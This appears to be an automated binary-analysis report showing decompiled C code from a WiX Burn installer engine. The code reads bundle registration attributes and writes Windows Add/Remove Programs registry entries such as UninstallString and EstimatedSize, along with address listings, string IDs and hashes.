                                                                                                                                                                  																	return _t190;
                                                                                                                                                                  																}
                                                                                                                                                                  																_push("Failed to set registration paths.");
                                                                                                                                                                  																L90:
                                                                                                                                                                  																_push(_t190);
                                                                                                                                                                  																E00430A57();
                                                                                                                                                                  																goto L91;
                                                                                                                                                                  															}
                                                                                                                                                                  															if(_t190 >= 0) {
                                                                                                                                                                  																 *((intOrPtr*)(_t176 + 0x9c)) = 1;
                                                                                                                                                                  																_t190 = E00435B5E(_v20, L"Manufacturer", _t176 + 0xa0);
                                                                                                                                                                  																if(_t190 >= 0) {
                                                                                                                                                                  																	_t190 = E00435B5E(_v20, L"Department", _t176 + 0xa4);
                                                                                                                                                                  																	if(_t190 == _t164 || _t190 >= 0) {
                                                                                                                                                                  																		_t190 = E00435B5E(_v20, L"ProductFamily", _t176 + 0xa8);
                                                                                                                                                                  																		if(_t190 == _t164 || _t190 >= 0) {
                                                                                                                                                                  																			_t190 = E00435B5E(_v20, L"Name", _t176 + 0xac);
                                                                                                                                                                  																			if(_t190 >= 0) {
                                                                                                                                                                  																				_t190 = E00435B5E(_v20, L"Classification", _t176 + 0xb0);
                                                                                                                                                                  																				if(_t190 >= 0) {
                                                                                                                                                                  																					goto L88;
                                                                                                                                                                  																				}
                                                                                                                                                                  																				_push("Failed to get @Classification.");
                                                                                                                                                                  																				goto L90;
                                                                                                                                                                  																			}
                                                                                                                                                                  																			_push("Failed to get @Name.");
                                                                                                                                                                  																		} else {
                                                                                                                                                                  																			_push("Failed to get @ProductFamily.");
                                                                                                                                                                  																		}
                                                                                                                                                                  																	} else {
                                                                                                                                                                  																		_push("Failed to get @Department.");
                                                                                                                                                                  																	}
                                                                                                                                                                  																	goto L90;
                                                                                                                                                                  																}
                                                                                                                                                                  																_push("Failed to get @Manufacturer.");
                                                                                                                                                                  																goto L90;
                                                                                                                                                                  															}
                                                                                                                                                                  															_push("Failed to select Update node.");
                                                                                                                                                                  															goto L90;
                                                                                                                                                                  														}
                                                                                                                                                                  														_push("Failed to parse software tag.");
                                                                                                                                                                  														goto L90;
                                                                                                                                                                  													}
                                                                                                                                                                  													if(_t188 >= 0) {
                                                                                                                                                                  														_t190 = E00435D6C(_t166, _v8, L"Register", _t176 + 4);
                                                                                                                                                                  														if(_t190 >= 0) {
                                                                                                                                                                  															_t190 = E00435B5E(_v8, L"DisplayName", _t176 + 0x60);
                                                                                                                                                                  															if(_t190 == 0x80070490 || _t190 >= 0) {
                                                                                                                                                                  																_t190 = E00435B5E(_v8, L"DisplayVersion", _t176 + 0x64);
                                                                                                                                                                  																if(_t190 == _t164 || _t190 >= 0) {
                                                                                                                                                                  																	_t190 = E00435B5E(_v8, L"Publisher", _t176 + 0x68);
                                                                                                                                                                  																	if(_t190 == _t164 || _t190 >= 0) {
                                                                                                                                                                  																		_t190 = E00435B5E(_v8, L"HelpLink", _t176 + 0x6c);
                                                                                                                                                                  																		if(_t190 == _t164 || _t190 >= 0) {
                                                                                                                                                                  																			_t190 = E00435B5E(_v8, L"HelpTelephone", _t176 + 0x70);
                                                                                                                                                                  																			if(_t190 == _t164 || _t190 >= 0) {
                                                                                                                                                                  																				_t190 = E00435B5E(_v8, L"AboutUrl", _t176 + 0x74);
                                                                                                                                                                  																				if(_t190 == _t164 || _t190 >= 0) {
                                                                                                                                                                  																					_t190 = E00435B5E(_v8, L"UpdateUrl", _t176 + 0x78);
                                                                                                                                                                  																					if(_t190 == _t164 || _t190 >= 0) {
                                                                                                                                                                  																						_t190 = E00435B5E(_v8, L"ParentDisplayName", _t176 + 0x7c);
                                                                                                                                                                  																						if(_t190 == _t164 || _t190 >= 0) {
                                                                                                                                                                  																							_t190 = E00435B5E(_v8, L"Comments", _t176 + 0x80);
                                                                                                                                                                  																							if(_t190 == _t164 || _t190 >= 0) {
                                                                                                                                                                  																								_t190 = E00435B5E(_v8, L"Contact", _t176 + 0x84);
                                                                                                                                                                  																								if(_t190 == _t164 || _t190 >= 0) {
                                                                                                                                                                  																									_t190 = E00435B5E(_v8, L"DisableModify",  &_v16);
                                                                                                                                                                  																									if(_t190 < 0) {
                                                                                                                                                                  																										if(_t190 == _t164) {
                                                                                                                                                                  																											 *(_t176 + 0x88) =  *(_t176 + 0x88) & 0x00000000;
                                                                                                                                                                  																											_t190 = 0;
                                                                                                                                                                  																										}
                                                                                                                                                                  																										L65:
                                                                                                                                                                  																										if(_t190 >= 0) {
                                                                                                                                                                  																											_t190 = E00435D6C(_t166, _v8, L"DisableRemove", _t176 + 0x90);
                                                                                                                                                                  																											if(_t190 == _t164) {
                                                                                                                                                                  																												goto L71;
                                                                                                                                                                  																											}
                                                                                                                                                                  																											if(_t190 >= 0) {
                                                                                                                                                                  																												 *(_t176 + 0x8c) = 1;
                                                                                                                                                                  																												goto L71;
                                                                                                                                                                  																											}
                                                                                                                                                                  																											_push("Failed to get @DisableRemove.");
                                                                                                                                                                  																											goto L90;
                                                                                                                                                                  																										}
                                                                                                                                                                  																										_push("Failed to get @DisableModify.");
                                                                                                                                                                  																										goto L90;
                                                                                                                                                                  																									}
                                                                                                                                                                  																									_t158 = CompareStringW(0x7f, 0, _v16, 0xffffffff, L"button", 0xffffffff);
                                                                                                                                                                  																									_t166 = 2;
                                                                                                                                                                  																									if(_t158 != _t166) {
                                                                                                                                                                  																										if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"yes", 0xffffffff) != 2) {
                                                                                                                                                                  																											if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"no", 0xffffffff) != 2) {
                                                                                                                                                                  																												_t190 = 0x8000ffff;
                                                                                                                                                                  																												E004300D9(_t160, "registration.cpp", 0xfd, 0x8000ffff);
                                                                                                                                                                  																												_push(_v16);
                                                                                                                                                                  																												_push("Invalid modify disabled type: %ls");
                                                                                                                                                                  																												L62:
                                                                                                                                                                  																												_push(_t190);
                                                                                                                                                                  																												E00430A57();
                                                                                                                                                                  																												goto L91;
                                                                                                                                                                  																											}
                                                                                                                                                                  																											 *(_t176 + 0x88) =  *(_t176 + 0x88) & 0x00000000;
                                                                                                                                                                  																											L60:
                                                                                                                                                                  																											_t164 = 0x80070490;
                                                                                                                                                                  																											goto L65;
                                                                                                                                                                  																										}
                                                                                                                                                                  																										 *(_t176 + 0x88) = 1;
                                                                                                                                                                  																										goto L60;
                                                                                                                                                                  																									}
                                                                                                                                                                  																									 *(_t176 + 0x88) = _t166;
                                                                                                                                                                  																									goto L60;
                                                                                                                                                                  																								} else {
                                                                                                                                                                  																									_push("Failed to get @Contact.");
                                                                                                                                                                  																									goto L90;
                                                                                                                                                                  																								}
                                                                                                                                                                  																							} else {
                                                                                                                                                                  																								_push("Failed to get @Comments.");
                                                                                                                                                                  																								goto L90;
                                                                                                                                                                  																							}
                                                                                                                                                                  																						} else {
                                                                                                                                                                  																							_push("Failed to get @ParentDisplayName.");
                                                                                                                                                                  																							goto L90;
                                                                                                                                                                  																						}
                                                                                                                                                                  																					} else {
                                                                                                                                                                  																						_push("Failed to get @UpdateUrl.");
                                                                                                                                                                  																						goto L90;
                                                                                                                                                                  																					}
                                                                                                                                                                  																				} else {
                                                                                                                                                                  																					_push("Failed to get @AboutUrl.");
                                                                                                                                                                  																					goto L90;
                                                                                                                                                                  																				}
                                                                                                                                                                  																			} else {
                                                                                                                                                                  																				_push("Failed to get @HelpTelephone.");
                                                                                                                                                                  																				goto L90;
                                                                                                                                                                  																			}
                                                                                                                                                                  																		} else {
                                                                                                                                                                  																			_push("Failed to get @HelpLink.");
                                                                                                                                                                  																			goto L90;
                                                                                                                                                                  																		}
                                                                                                                                                                  																	} else {
                                                                                                                                                                  																		_push("Failed to get @Publisher.");
                                                                                                                                                                  																		goto L90;
                                                                                                                                                                  																	}
                                                                                                                                                                  																} else {
                                                                                                                                                                  																	_push("Failed to get @DisplayVersion.");
                                                                                                                                                                  																	goto L90;
                                                                                                                                                                  																}
                                                                                                                                                                  															} else {
                                                                                                                                                                  																_push("Failed to get @DisplayName.");
                                                                                                                                                                  																goto L90;
                                                                                                                                                                  															}
                                                                                                                                                                  														}
                                                                                                                                                                  														_push("Failed to get @Register.");
                                                                                                                                                                  														goto L90;
                                                                                                                                                                  													}
                                                                                                                                                                  													_push("Failed to select ARP node.");
                                                                                                                                                                  													goto L90;
                                                                                                                                                                  												}
                                                                                                                                                                  												_push("Failed to get @PerMachine.");
                                                                                                                                                                  												goto L90;
                                                                                                                                                                  											}
                                                                                                                                                                  											_push("Failed to get @ExecutableName.");
                                                                                                                                                                  											goto L90;
                                                                                                                                                                  										}
                                                                                                                                                                  										_push("Failed to get @ProviderKey.");
                                                                                                                                                                  										goto L90;
                                                                                                                                                                  									}
                                                                                                                                                                  									_push(_v16);
                                                                                                                                                                  									_push("Failed to parse @Version: %ls");
                                                                                                                                                                  									goto L62;
                                                                                                                                                                  								}
                                                                                                                                                                  								_push("Failed to get @Version.");
                                                                                                                                                                  								goto L90;
                                                                                                                                                                  							}
                                                                                                                                                                  							_push("Failed to parse related bundles");
                                                                                                                                                                  							goto L90;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push("Failed to get @Tag.");
                                                                                                                                                                  						goto L90;
                                                                                                                                                                  					}
                                                                                                                                                                  					_push("Failed to get @Id.");
                                                                                                                                                                  					goto L90;
                                                                                                                                                                  				}
                                                                                                                                                                  				_push("Failed to select registration node.");
                                                                                                                                                                  				_push(_t179);
                                                                                                                                                                  				E00430A57();
                                                                                                                                                                  				goto L92;
                                                                                                                                                                  			}



















                                                                                                                                                                  0x0040ab54
                                                                                                                                                                  0x0040ab54
                                                                                                                                                                  0x0040ab55
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ab5a
                                                                                                                                                                  0x0040ab29
                                                                                                                                                                  0x0040ab30
                                                                                                                                                                  0x0040ab30
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ab30
                                                                                                                                                                  0x0040ab06
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ab06
                                                                                                                                                                  0x0040aae7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040aaa3
                                                                                                                                                                  0x0040aaa3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040aaa3
                                                                                                                                                                  0x0040aa7b
                                                                                                                                                                  0x0040aa7b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040aa7b
                                                                                                                                                                  0x0040aa53
                                                                                                                                                                  0x0040aa53
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040aa53
                                                                                                                                                                  0x0040aa2e
                                                                                                                                                                  0x0040aa2e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040aa2e
                                                                                                                                                                  0x0040aa09
                                                                                                                                                                  0x0040aa09
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040aa09
                                                                                                                                                                  0x0040a9e4
                                                                                                                                                                  0x0040a9e4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a9e4
                                                                                                                                                                  0x0040a9bf
                                                                                                                                                                  0x0040a9bf
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a9bf
                                                                                                                                                                  0x0040a99a
                                                                                                                                                                  0x0040a99a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a99a
                                                                                                                                                                  0x0040a975
                                                                                                                                                                  0x0040a975
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a975
                                                                                                                                                                  0x0040a950
                                                                                                                                                                  0x0040a950
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a950
                                                                                                                                                                  0x0040a94a
                                                                                                                                                                  0x0040a92b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a92b
                                                                                                                                                                  0x0040a90a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a90a
                                                                                                                                                                  0x0040a8e0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a8e0
                                                                                                                                                                  0x0040a8c2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a8c2
                                                                                                                                                                  0x0040a8a1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a8a1
                                                                                                                                                                  0x0040a87d
                                                                                                                                                                  0x0040a880
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a880
                                                                                                                                                                  0x0040a85f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a85f
                                                                                                                                                                  0x0040a83e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a83e
                                                                                                                                                                  0x0040a825
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a825
                                                                                                                                                                  0x0040a804
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a804
                                                                                                                                                                  0x0040a7d7
                                                                                                                                                                  0x0040a7dc
                                                                                                                                                                  0x0040a7dd
                                                                                                                                                                  0x00000000

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
                                                                                                                                                                  • API String ID: 0-2956246334
                                                                                                                                                                  • Opcode ID: 7f119c4d7a78bae91f84678ab1217b10f4eac9558258ceb4dbcdffff1c679630
                                                                                                                                                                  • Instruction ID: 9d56108fd273e98c5b39d667d263fea09f03945684d6d1e09a9ee18e6e1f7c96
                                                                                                                                                                  • Opcode Fuzzy Hash: 7f119c4d7a78bae91f84678ab1217b10f4eac9558258ceb4dbcdffff1c679630
                                                                                                                                                                  • Instruction Fuzzy Hash: D9E1A732A447357BEB21AA608C41F6EB664AB04710F220677FE11B72D0D77DAD315B8E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                                                  			E0040AD55(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, signed int _a28, unsigned int _a32) {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				unsigned int _v16;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				unsigned int _t124;
                                                                                                                                                                  				char* _t125;
                                                                                                                                                                  				char* _t126;
                                                                                                                                                                  				signed int _t135;
                                                                                                                                                                  				char* _t143;
                                                                                                                                                                  				intOrPtr _t144;
                                                                                                                                                                  				char* _t146;
                                                                                                                                                                  				char* _t147;
                                                                                                                                                                  				intOrPtr _t148;
                                                                                                                                                                  				signed int _t181;
                                                                                                                                                                  				unsigned int _t184;
                                                                                                                                                                  				intOrPtr* _t185;
                                                                                                                                                                  				char* _t186;
                                                                                                                                                                  				void* _t187;
                                                                                                                                                                  
                                                                                                                                                                  				_t185 = _a8;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				if((_a20 & 0x00000001) == 0) {
                                                                                                                                                                  					L3:
                                                                                                                                                                  					_t186 = E00432129( *((intOrPtr*)(_t185 + 0x4c)),  *((intOrPtr*)(_t185 + 0x50)), 0x20006,  &_v8);
                                                                                                                                                                  					__eflags = _t186;
                                                                                                                                                                  					if(_t186 >= 0) {
                                                                                                                                                                  						__eflags = _a20 & 0x00000002;
                                                                                                                                                                  						if((_a20 & 0x00000002) == 0) {
                                                                                                                                                                  							L85:
                                                                                                                                                                  							__eflags = _a20 & 0x00000004;
                                                                                                                                                                  							if((_a20 & 0x00000004) == 0) {
                                                                                                                                                                  								L97:
                                                                                                                                                                  								__eflags = _a24 - 1;
                                                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                                                  									L100:
                                                                                                                                                                  									_t186 = E0040A0F6(_t177, _t183, __eflags, _t185, _v8, 1, 0);
                                                                                                                                                                  									__eflags = _t186;
                                                                                                                                                                  									if(_t186 < 0) {
                                                                                                                                                                  										_push("Failed to update resume mode.");
                                                                                                                                                                  										goto L102;
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t186 = E0041F17C(_t177, _t185);
                                                                                                                                                                  									__eflags = _t186;
                                                                                                                                                                  									if(__eflags >= 0) {
                                                                                                                                                                  										goto L100;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_push("Failed to register the bundle dependency key.");
                                                                                                                                                                  										goto L102;
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t124 = _a32;
                                                                                                                                                                  								_t177 = (_t124 << 0x00000020 | _a28) >> 0xa;
                                                                                                                                                                  								_t125 = _t124 >> 0xa;
                                                                                                                                                                  								__eflags = _t125;
                                                                                                                                                                  								if(__eflags < 0) {
                                                                                                                                                                  									goto L97;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									if(__eflags > 0) {
                                                                                                                                                                  										L90:
                                                                                                                                                                  										_t126 = 0xffffffff;
                                                                                                                                                                  										if(__eflags <= 0) {
                                                                                                                                                                  											__eflags = _t177 - _t126;
                                                                                                                                                                  											if(_t177 <= _t126) {
                                                                                                                                                                  												goto L92;
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  										goto L93;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										__eflags = _t177;
                                                                                                                                                                  										if(_t177 <= 0) {
                                                                                                                                                                  											goto L97;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											__eflags = _t125;
                                                                                                                                                                  											if(__eflags < 0) {
                                                                                                                                                                  												L92:
                                                                                                                                                                  												_t126 = _t177;
                                                                                                                                                                  											} else {
                                                                                                                                                                  												goto L90;
                                                                                                                                                                  											}
                                                                                                                                                                  											L93:
                                                                                                                                                                  											_t186 = E004329C8(_v8, L"EstimatedSize", _t126);
                                                                                                                                                                  											__eflags = _t186;
                                                                                                                                                                  											if(_t186 >= 0) {
                                                                                                                                                                  												goto L97;
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_push(L"EstimatedSize");
                                                                                                                                                                  												goto L95;
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t186 = E00432A16(_t177, _v8, L"BundleCachePath",  *((intOrPtr*)(_t185 + 0x54)));
                                                                                                                                                                  							__eflags = _t186;
                                                                                                                                                                  							if(_t186 >= 0) {
                                                                                                                                                                  								_t186 = E00432ABE(_v8, L"BundleUpgradeCode",  *((intOrPtr*)(_t185 + 0x1c)),  *((intOrPtr*)(_t185 + 0x20)));
                                                                                                                                                                  								__eflags = _t186;
                                                                                                                                                                  								if(_t186 >= 0) {
                                                                                                                                                                  									_t186 = E00432ABE(_v8, L"BundleAddonCode",  *((intOrPtr*)(_t185 + 0x24)),  *((intOrPtr*)(_t185 + 0x28)));
                                                                                                                                                                  									__eflags = _t186;
                                                                                                                                                                  									if(_t186 >= 0) {
                                                                                                                                                                  										_t186 = E00432ABE(_v8, L"BundleDetectCode",  *((intOrPtr*)(_t185 + 0x14)),  *((intOrPtr*)(_t185 + 0x18)));
                                                                                                                                                                  										__eflags = _t186;
                                                                                                                                                                  										if(_t186 >= 0) {
                                                                                                                                                                  											_t186 = E00432ABE(_v8, L"BundlePatchCode",  *((intOrPtr*)(_t185 + 0x2c)),  *((intOrPtr*)(_t185 + 0x30)));
                                                                                                                                                                  											__eflags = _t186;
                                                                                                                                                                  											if(_t186 >= 0) {
                                                                                                                                                                  												_t181 =  *(_t185 + 0x38);
                                                                                                                                                                  												_t184 =  *(_t185 + 0x3c);
                                                                                                                                                                  												_push(_t181 & 0x0000ffff);
                                                                                                                                                                  												_t135 = _t184;
                                                                                                                                                                  												_t182 = (_t135 << 0x00000020 | _t181) >> 0x10;
                                                                                                                                                                  												_push((_t135 << 0x00000020 | _t181) >> 0x10 & 0x0000ffff);
                                                                                                                                                                  												_push(_t184 & 0x0000ffff);
                                                                                                                                                                  												_v16 = _t184;
                                                                                                                                                                  												_t183 = _t184 >> 0x10;
                                                                                                                                                                  												_t186 = E00432BF4((_t135 << 0x00000020 | _t181) >> 0x10, _v8, L"BundleVersion", L"%hu.%hu.%hu.%hu", _t184 >> 0x10);
                                                                                                                                                                  												_t187 = _t187 + 0x1c;
                                                                                                                                                                  												__eflags = _t186;
                                                                                                                                                                  												if(_t186 >= 0) {
                                                                                                                                                                  													__eflags =  *(_t185 + 0x44);
                                                                                                                                                                  													if( *(_t185 + 0x44) == 0) {
                                                                                                                                                                  														L21:
                                                                                                                                                                  														__eflags =  *(_t185 + 0x10);
                                                                                                                                                                  														if( *(_t185 + 0x10) == 0) {
                                                                                                                                                                  															L24:
                                                                                                                                                                  															_t186 = E00432BF4(_t182, _v8, L"EngineVersion", L"%hs", "3.8.1128.0");
                                                                                                                                                                  															_t187 = _t187 + 0x10;
                                                                                                                                                                  															__eflags = _t186;
                                                                                                                                                                  															if(_t186 >= 0) {
                                                                                                                                                                  																_t186 = E00432BF4(_t182, _v8, L"DisplayIcon", L"%s,0",  *((intOrPtr*)(_t185 + 0x54)));
                                                                                                                                                                  																_t187 = _t187 + 0x10;
                                                                                                                                                                  																__eflags = _t186;
                                                                                                                                                                  																if(_t186 >= 0) {
                                                                                                                                                                  																	_t143 = E004099CC(_t182, _t185, _a12,  &_v12);
                                                                                                                                                                  																	__eflags = _t143;
                                                                                                                                                                  																	_t144 = _v12;
                                                                                                                                                                  																	if(_t143 < 0) {
                                                                                                                                                                  																		_t144 =  *((intOrPtr*)(_t185 + 0x60));
                                                                                                                                                                  																	}
                                                                                                                                                                  																	_t186 = E00432A16(_t182, _v8, L"DisplayName", _t144);
                                                                                                                                                                  																	__eflags = _t186;
                                                                                                                                                                  																	if(_t186 >= 0) {
                                                                                                                                                                  																		__eflags =  *(_t185 + 0x64);
                                                                                                                                                                  																		if( *(_t185 + 0x64) == 0) {
                                                                                                                                                                  																			L35:
                                                                                                                                                                  																			__eflags =  *(_t185 + 0x68);
                                                                                                                                                                  																			if( *(_t185 + 0x68) == 0) {
                                                                                                                                                                  																				L38:
                                                                                                                                                                  																				__eflags =  *(_t185 + 0x6c);
                                                                                                                                                                  																				if( *(_t185 + 0x6c) == 0) {
                                                                                                                                                                  																					L41:
                                                                                                                                                                  																					__eflags =  *(_t185 + 0x70);
                                                                                                                                                                  																					if( *(_t185 + 0x70) == 0) {
                                                                                                                                                                  																						L44:
                                                                                                                                                                  																						__eflags =  *(_t185 + 0x74);
                                                                                                                                                                  																						if( *(_t185 + 0x74) == 0) {
                                                                                                                                                                  																							L47:
                                                                                                                                                                  																							__eflags =  *(_t185 + 0x78);
                                                                                                                                                                  																							if( *(_t185 + 0x78) == 0) {
                                                                                                                                                                  																								L50:
                                                                                                                                                                  																								__eflags =  *(_t185 + 0x7c);
                                                                                                                                                                  																								if( *(_t185 + 0x7c) == 0) {
                                                                                                                                                                  																									L55:
                                                                                                                                                                  																									_t146 =  *(_t185 + 0x80);
                                                                                                                                                                  																									__eflags = _t146;
                                                                                                                                                                  																									if(_t146 == 0) {
                                                                                                                                                                  																										L58:
                                                                                                                                                                  																										_t147 =  *(_t185 + 0x84);
                                                                                                                                                                  																										__eflags = _t147;
                                                                                                                                                                  																										if(_t147 == 0) {
                                                                                                                                                                  																											L61:
                                                                                                                                                                  																											_t148 =  *((intOrPtr*)(_t185 + 0x88));
                                                                                                                                                                  																											__eflags = _t148 - 1;
                                                                                                                                                                  																											if(_t148 != 1) {
                                                                                                                                                                  																												__eflags = _t148 - 2;
                                                                                                                                                                  																												if(_t148 == 2) {
                                                                                                                                                                  																													goto L69;
                                                                                                                                                                  																												} else {
                                                                                                                                                                  																													_t186 = E00432BF4(_t182, _v8, L"ModifyPath", L"\"%ls\" /modify",  *((intOrPtr*)(_t185 + 0x54)));
                                                                                                                                                                  																													_t187 = _t187 + 0x10;
                                                                                                                                                                  																													__eflags = _t186;
                                                                                                                                                                  																													if(_t186 >= 0) {
                                                                                                                                                                  																														_t186 = E004329C8(_v8, L"NoElevateOnModify", 1);
                                                                                                                                                                  																														__eflags = _t186;
                                                                                                                                                                  																														if(_t186 >= 0) {
                                                                                                                                                                  																															goto L69;
                                                                                                                                                                  																														} else {
                                                                                                                                                                  																															_push(L"NoElevateOnModify");
                                                                                                                                                                  																															goto L95;
                                                                                                                                                                  																														}
                                                                                                                                                                  																													} else {
                                                                                                                                                                  																														_push(L"ModifyPath");
                                                                                                                                                                  																														goto L95;
                                                                                                                                                                  																													}
                                                                                                                                                                  																												}
                                                                                                                                                                  																											} else {
                                                                                                                                                                  																												_t186 = E004329C8(_v8, L"NoModify", _t148);
                                                                                                                                                                  																												__eflags = _t186;
                                                                                                                                                                  																												if(_t186 >= 0) {
                                                                                                                                                                  																													L69:
                                                                                                                                                                  																													__eflags =  *(_t185 + 0x8c);
                                                                                                                                                                  																													if( *(_t185 + 0x8c) == 0) {
                                                                                                                                                                  																														L72:
                                                                                                                                                                  																														__eflags =  *(_t185 + 4);
                                                                                                                                                                  																														if( *(_t185 + 4) != 0) {
                                                                                                                                                                  																															L75:
                                                                                                                                                                  																															_t186 = E00432BF4(_t182, _v8, L"QuietUninstallString", L"\"%ls\" /uninstall /quiet",  *((intOrPtr*)(_t185 + 0x54)));
                                                                                                                                                                  																															_t187 = _t187 + 0x10;
                                                                                                                                                                  																															__eflags = _t186;
                                                                                                                                                                  																															if(_t186 >= 0) {
                                                                                                                                                                  																																__eflags =  *((intOrPtr*)(_t185 + 0x88)) - 2;
                                                                                                                                                                  																																_t177 = L" /uninstall";
                                                                                                                                                                  																																_t151 =  !=  ? L" /uninstall" : L"/modify";
                                                                                                                                                                  																																_push( !=  ? L" /uninstall" : L"/modify");
                                                                                                                                                                  																																_t186 = E00432BF4(L" /uninstall", _v8, L"UninstallString", L"\"%ls\" %ls",  *((intOrPtr*)(_t185 + 0x54)));
                                                                                                                                                                  																																_t187 = _t187 + 0x14;
                                                                                                                                                                  																																__eflags = _t186;
                                                                                                                                                                  																																if(_t186 >= 0) {
                                                                                                                                                                  																																	__eflags =  *(_t185 + 0x98);
                                                                                                                                                                  																																	if( *(_t185 + 0x98) == 0) {
                                                                                                                                                                  																																		L82:
                                                                                                                                                                  																																		__eflags =  *(_t185 + 0x9c);
                                                                                                                                                                  																																		if( *(_t185 + 0x9c) == 0) {
                                                                                                                                                                  																																			goto L85;
                                                                                                                                                                  																																		} else {
                                                                                                                                                                  																																			_t186 = E0040A3B1(_t177, _t185, _a12);
                                                                                                                                                                  																																			__eflags = _t186;
                                                                                                                                                                  																																			if(_t186 >= 0) {
                                                                                                                                                                  																																				goto L85;
                                                                                                                                                                  																																			} else {
                                                                                                                                                                  																																				_push("Failed to write update registration.");
                                                                                                                                                                  																																				goto L102;
                                                                                                                                                                  																																			}
                                                                                                                                                                  																																		}
                                                                                                                                                                  																																	} else {
                                                                                                                                                                  																																		_t97 = _t185 + 0x94; // 0x14c
                                                                                                                                                                  																																		_t186 = E0040A284( *_t185, _t97);
                                                                                                                                                                  																																		__eflags = _t186;
                                                                                                                                                                  																																		if(_t186 >= 0) {
                                                                                                                                                                  																																			goto L82;
                                                                                                                                                                  																																		} else {
                                                                                                                                                                  																																			_push("Failed to write software tags.");
                                                                                                                                                                  																																			goto L102;
                                                                                                                                                                  																																		}
                                                                                                                                                                  																																	}
                                                                                                                                                                  																																} else {
                                                                                                                                                                  																																	_push(L"UninstallString");
                                                                                                                                                                  																																	goto L95;
                                                                                                                                                                  																																}
                                                                                                                                                                  																															} else {
                                                                                                                                                                  																																_push(L"QuietUninstallString");
                                                                                                                                                                  																																goto L95;
                                                                                                                                                                  																															}
                                                                                                                                                                  																														} else {
                                                                                                                                                                  																															_t186 = E004329C8(_v8, L"SystemComponent", 1);
                                                                                                                                                                  																															__eflags = _t186;
                                                                                                                                                                  																															if(_t186 >= 0) {
                                                                                                                                                                  																																goto L75;
                                                                                                                                                                  																															} else {
                                                                                                                                                                  																																_push(L"SystemComponent");
                                                                                                                                                                  																																goto L95;
